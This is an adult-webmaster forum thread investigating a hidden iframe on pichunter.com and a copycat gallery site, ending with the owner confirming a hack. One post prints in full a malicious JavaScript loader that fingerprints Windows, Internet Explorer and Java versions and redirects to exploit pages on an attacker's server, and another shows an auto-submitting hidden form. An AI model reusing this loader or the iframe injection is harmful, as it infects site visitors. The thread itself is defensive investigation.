Pichunter - Clever seo ? or ?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • SmokeyTheBear
    ►SouthOfHeaven
    • Jun 2004
    • 28609

    #1

    Pichunter - Clever seo ? or ?

    go to pichunter.com , notice at the very bottom theres a hidden 0x0 iframe pointing to http://seekmat.com/my.php?iframe=1

    pointing to wierd pages like http://colombia.seekmat.com/ is that some sort of seo work or did pichunter get hacked



    also is this pichunters site wxw.dougansss.com/tgp/ ( DO NOT VISIT - VIRUS ON PAGE )

    all the images are hotlinked from pichunter which isnt so strange but all the ref codes appear to also be pichunters ref codes , nastydollars , tcg bangrbros realitycash and that seems strange to just give all the traffic away to pichunter and make him free money while infecting people with an unknown virus
    hatisblack at yahoo.com
  • Tempest
    Too lazy to set a custom title
    • May 2004
    • 10217

    #2
    I didn't get an iframe on the page that loaded for me.

    Comment

    • Daruma
      Confirmed User
      • Nov 2002
      • 3494

      #3
      nothing for me on mac ;)

      RIP TD

      Comment

      • martinsc
        Too lazy to set a custom title
        • Jun 2005
        • 27047

        #4
        i don't get it...

        do people really think that hidden content is still helping them with the SE's?
        Make Money

        Comment

        • Daruma
          Confirmed User
          • Nov 2002
          • 3494

          #5
          extremeeeem
          delay


          on mac



          autocad????????????

          RIP TD

          Comment

          • 2HousePlague
            CURATOR
            • Jul 2004
            • 14572

            #6
            State of the Art, yo.


            2hp
            tada!

            Comment

            • borked
              Totally Borked
              • Feb 2005
              • 6284

              #7
              no iframe on my FF on a Mac -
              seekmat.com/my.php?iframe=1 is weird though - just random form post actions...
              eg:
              Code:
              <html>
              <form name="x" method="post" action="http://invicta.bfind.info/search.php?q=invicta 9937">
              <input type="hidden" name="guest" value="1">
              </form>
              <script>
              x.submit();
              </script>
              </html>
              where the action="" changes randomly upon reload...

              For coding work - hit me up on andy // borkedcoder // com
              (consider figuring out the email as test #1)



              All models are wrong, but some are useful. George E.P. Box. p202

              Comment

              • borked
                Totally Borked
                • Feb 2005
                • 6284

                #8
                my guess is random searches for a pay per search programme or something.... so every visitor generates a hidden search which earns him .0000001cent or something.

                For coding work - hit me up on andy // borkedcoder // com
                (consider figuring out the email as test #1)



                All models are wrong, but some are useful. George E.P. Box. p202

                Comment

                • DarkJedi
                  No Refunds Issued.
                  • Feb 2001
                  • 28301

                  #9
                  Black SEO doorway pages. Nothing clever about them though.

                  Comment

                  • Matt 26z
                    So Fucking Banned
                    • Apr 2002
                    • 18481

                    #10
                    Just a guess here... Using the PicHunter domain to increase the pagerank of those SE pages, and then doing a redirect once they get picked up?

                    Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol

                    Comment

                    • Jakke PNG
                      ex-TeenGodFather
                      • Nov 2001
                      • 20306

                      #11
                      Originally posted by Matt 26z
                      Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol
                      It's actually pretty nice to know SOMEONE looks at shady shit. I know I don't have time.
                      ..and I'm off.

                      Comment

                      • SmokeyTheBear
                        ►SouthOfHeaven
                        • Jun 2004
                        • 28609

                        #12
                        Originally posted by Matt 26z
                        Just a guess here... Using the PicHunter domain to increase the pagerank of those SE pages, and then doing a redirect once they get picked up?

                        Whatever the case, don't you have anything better to do than look at the source code of TGP's? lol
                        someone asked me to check out their tgp because they suspected something in the code causing a skim ofg traffic to cgi-dnsl.com that turns out to be dougansss.com that is just a copy of pichunter including the hidden iframes on both sites . turns out he was right .
                        hatisblack at yahoo.com

                        Comment

                        • DjSap
                          Confirmed User
                          • Jul 2002
                          • 3869

                          #13
                          i would hope that the owner is smart enough to fuck with se's, since he has an established site and not a new one...
                          Blog Themes, TGP Design, Writing Services, Grunt Work
                          ICQ: 66871495

                          Comment

                          • rhizome
                            Confirmed User
                            • Jan 2001
                            • 788

                            #14
                            dougansss.com is responsible for the TM3 hacks. He also totally fucked up my server forcing me to get a new one.

                            Comment

                            • the Shemp
                              congrats to the winners
                              • Nov 2001
                              • 10891

                              #15
                              bump....
                              i use Vacares...so should you
                              Submit your picture galleries to my site...Outlaw TGP

                              Comment

                              • vcup
                                Registered User
                                • Jan 2006
                                • 2

                                #16
                                how do i get on pichunter?

                                Comment

                                • RRRED
                                  Confirmed User
                                  • Jan 2001
                                  • 6754

                                  #17
                                  I don't get it...

                                  Comment

                                  • emthree
                                    Dialer Kingpin
                                    • Jun 2003
                                    • 10816

                                    #18
                                    SEO IMG Spam?

                                    • Sell Patches & Pills •

                                    Comment

                                    • fris
                                      Too lazy to set a custom title
                                      • Aug 2002
                                      • 55679

                                      #19
                                      i doubt pichunter is a part of that.
                                      Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.

                                      Comment

                                      • jacked
                                        sperm tail
                                        • May 2004
                                        • 11019

                                        #20
                                        seems pretty sketchie to me...
                                        Got Cam Models?
                                        icq: 361-607-616

                                        Comment

                                        • free4porn
                                          Confirmed User
                                          • Jun 2005
                                          • 4654

                                          #21
                                          does sound strange to me
                                          Switch To Fling Now! I'm on 1:201 paid signups sending little traffic! Make $$$
                                          Free Porn

                                          Comment

                                          • polle54
                                            Confirmed User
                                            • Jul 2004
                                            • 4626

                                            #22
                                            well

                                            the iframe on wxw.dougansss.com/tgp/ is definately exploits....

                                            this is the exploit code....
                                            wxw.dougansss.com/dar/loading.html
                                            and it explains why I wasn't hit by it when I entered, it's only IE they target...

                                            Code:
                                            <IE:clientCaps ID="oClientCaps" /> 
                                            <script type="text/javascript" language="JavaScript">
                                             var ExploitNumber=0; 
                                             var Bug_param="";
                                            
                                             function GetVersion(CLSID)
                                               {
                                                        if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
                                                           {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
                                                        else
                                                           {return Array(0,0,0,0);}
                                               }
                                            
                                             function Get_Win_Version(IE_vers)
                                               {
                                                 if (IE_vers.indexOf('Windows 95') != -1) return "95"
                                                 else if (IE_vers.indexOf('Windows NT 4') != -1) return "NT"
                                                 else if (IE_vers.indexOf('Win 9x 4.9') != -1) return "ME"
                                                 else if (IE_vers.indexOf('Windows 98') != -1) return "98"
                                                 else if (IE_vers.indexOf('Windows NT 5.0') != -1) return "2K"
                                                 else if (IE_vers.indexOf('Windows NT 5.1') != -1) return "XP"
                                                 else if (IE_vers.indexOf('Windows NT 5.2') != -1) return "2K3"
                                               }
                                             
                                             var CGI_Script="http://wxw.dougansss.com/dar/";
                                             if (navigator.appName=="Microsoft Internet Explorer")
                                               {
                                                 
                                                  var IEversion=navigator.appVersion;
                                                  var IEplatform=navigator.platform;
                                                  if (IEplatform.search("Win32") != -1)
                                                  {
                                                     var WinOS=Get_Win_Version(IEversion);
                                                     FullVersion=clientInformation.appMinorVersion;
                                                     PatchList=FullVersion.split(";");
                                                            
                                                     var JVM_vers  = GetVersion("{08B0E5C0-4FCB-11CF-AAA5-00401C608500}"); 
                                                     var IE_vers   = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
                                                     
                                                     var XP_SP2_patched=0;
                                                      
                                                     switch (WinOS)
                                                     {
                                                         case "2K":
                                                                   if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                                                                   {  ExploitNumber=1;  }    
                                                                   else                                // if JVM = 5.0.3810.0 or higher
                                                                   { 
                                                                     if (IE_vers[0]==6)
                                                                     {  ExploitNumber=3; }
                                                                     else
                                                                     {  ExploitNumber=2; }
                                                                   } 
                                                                   
                                                                   break;
                                                         case "2K3":
                                                                   ExploitNumber=3;  
                                                                   break;             
                                                         case "XP":
                                                                                                            
                                                                        if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                                                                        {  ExploitNumber=1;  }    
                                                                        else                                // if JVM = 5.0.3810.0 or higher
                                                                        {
                                                                           for (var i=0; i < PatchList.length; i++)
                                                                           {  
                                                                              if (PatchList[i]=="SP2")
                                                                              {  XP_SP2_patched=1; }
                                                                             
                                                                           }
                                                                           if (XP_SP2_patched==0)
                                                                           {
                                                                              ExploitNumber=3;  
                                                                           }
                                                                           else
                                                                           {
                                                                              ExploitNumber=4;   
                                                                           }
                                                                        }
                                                                   break;          
                                                         default:  
                                                                   if ((JVM_vers[0]!=0)&&(JVM_vers[2]<3810))
                                                                   {  ExploitNumber=1;  }             
                                                                   else
                                                                   {  ExploitNumber=2;  }            // if JVM = 5.0.3810.0 or higher
                                                                 
                                                                   break;         
                                                     }
                                                     // launching exploit which number is depends on Windows and IE versions
                                                          
                                                     switch (ExploitNumber)
                                                     {
                                                         case  1:
                                            					// 95, NT, ME, 98, 2k, XP
                                                                   Bug_param=Bug_param+"e1/e1.html";
                                                                   break;
                                                         case  2:
                                            					// 95, NT, ME, 98, 2k - if JVM = 5.0.3810.0 or higher
                                                                   Bug_param=Bug_param+"e2/e2.html";
                                                                   break;
                                                         case  3:
                                            					// 2k+IE6, 2K3, XP+SP1 - if JVM = 5.0.3810.0 or higher
                                                                   Bug_param=Bug_param+"e3/e3.html";
                                                                   break; 
                                                         default:
                                                                   break;                   
                                                      }
                                                  }
                                               }
                                            
                                            if (Bug_param != ''){
                                            	window.location=CGI_Script+Bug_param;
                                            }
                                            it's not like they are trying to hide it's a exploit LOL
                                            ICQ# 143561781

                                            Comment

                                            • polle54
                                              Confirmed User
                                              • Jul 2004
                                              • 4626

                                              #23
                                              and another thing

                                              the reason they have all the same ref's and things are because they stole all the gallery links and thumbs.. the easiest way to maintain a CJ site...
                                              I don't think it's illigal since all the content is third party and submitted to all kind of sites...

                                              I highly doubt that pichunter has anything to do with this site.

                                              They probably send 0% to the content and the traffic probably comes from varius hacks and maybe trading in the dark area of this industry
                                              Last edited by polle54; 10-28-2006, 12:07 PM.
                                              ICQ# 143561781

                                              Comment

                                              • gotys
                                                Confirmed User
                                                • Feb 2002
                                                • 767

                                                #24
                                                Well am I glad I got this 2 days late Someone appereantly hacked us. You guys need to ICQ me when you find something like this, please!

                                                Thank you for pointing it out at least here though
                                                PicHunter.com,ClipHunter.com,HomeTwat.com
                                                --------------------------------------------
                                                not accepting any trades, not selling spots

                                                Comment

                                                • SmokeyTheBear
                                                  ►SouthOfHeaven
                                                  • Jun 2004
                                                  • 28609

                                                  #25
                                                  Originally posted by gotys
                                                  Well am I glad I got this 2 days late Someone appereantly hacked us. You guys need to ICQ me when you find something like this, please!

                                                  Thank you for pointing it out at least here though
                                                  sorry i didnt have any contact info or i would have.. figured gfy word of mouth usually travels fastest
                                                  hatisblack at yahoo.com

                                                  Comment

                                                  • bp4l-xp
                                                    Confirmed User
                                                    • May 2003
                                                    • 168

                                                    #26
                                                    sorry to bump this one but
                                                    we also have been hacked by this motherfucker
                                                    he is a russian guy
                                                    russian business network (his host) doesn't give a fuck about my ABUSE mail.

                                                    be careful, change your passwords and protect your scripts with passwords!

                                                    Comment

                                                    Working...